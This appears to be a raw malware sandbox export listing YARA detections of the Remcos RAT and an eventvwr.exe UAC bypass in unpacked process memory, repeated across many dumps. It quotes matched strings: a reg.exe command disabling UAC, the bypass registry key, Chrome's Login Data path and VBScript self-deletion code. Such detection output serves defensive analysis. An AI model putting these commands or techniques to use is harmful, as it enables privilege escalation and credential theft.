28.0.InstallUtil.exe.400000.4.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
24.2.Qerdo.exe.40dfb10.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.Qerdo.exe.40dfb10.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x5f900:$s1: \Classes\mscfile\shell\open\command 0x5f960:$s1: \Classes\mscfile\shell\open\command 0x5f948:$s2: eventvwr.exe
24.2.Qerdo.exe.40dfb10.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x60894:$str_a1: C:\Windows\System32\cmd.exe 0x60810:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60810:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fdf8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60450:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f9f4:$str_b2: Executing file: 0x609d8:$str_b3: GetDirectListeningPort 0x60210:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60438:$str_b7: \update.vbs 0x5fa1c:$str_b9: Downloaded file: 0x5fa08:$str_b10: Downloading file: 0x5faac:$str_b12: Failed to upload file: 0x609a0:$str_b13: StartForward 0x609c0:$str_b14: StopForward 0x603e0:$str_b15: fso.DeleteFile " 0x60374:$str_b16: On Error Resume Next 0x60410:$str_b17: fso.DeleteFolder " 0x5fa9c:$str_b18: Uploaded file: 0x5fa5c:$str_b19: Unable to delete: 0x603a8:$str_b20: while fso.FileExists(" 0x5ff31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.4.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.2.InstallUtil.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.InstallUtil.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.2.InstallUtil.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.5.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.5.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.6.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.6.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.2.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
19.2.Qerdo.exe.35cfb10.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
19.2.Qerdo.exe.35cfb10.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x5f900:$s1: \Classes\mscfile\shell\open\command 0x5f960:$s1: \Classes\mscfile\shell\open\command 0x5f948:$s2: eventvwr.exe
19.2.Qerdo.exe.35cfb10.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x60894:$str_a1: C:\Windows\System32\cmd.exe 0x60810:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60810:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5fdf8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60450:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5f9f4:$str_b2: Executing file: 0x609d8:$str_b3: GetDirectListeningPort 0x60210:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60438:$str_b7: \update.vbs 0x5fa1c:$str_b9: Downloaded file: 0x5fa08:$str_b10: Downloading file: 0x5faac:$str_b12: Failed to upload file: 0x609a0:$str_b13: StartForward 0x609c0:$str_b14: StopForward 0x603e0:$str_b15: fso.DeleteFile " 0x60374:$str_b16: On Error Resume Next 0x60410:$str_b17: fso.DeleteFolder " 0x5fa9c:$str_b18: Uploaded file: 0x5fa5c:$str_b19: Unable to delete: 0x603a8:$str_b20: while fso.FileExists(" 0x5ff31:$str_c0: [Firefox StoredLogins not found]
24.2.Qerdo.exe.40dfb10.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.Qerdo.exe.40dfb10.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
24.2.Qerdo.exe.40dfb10.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 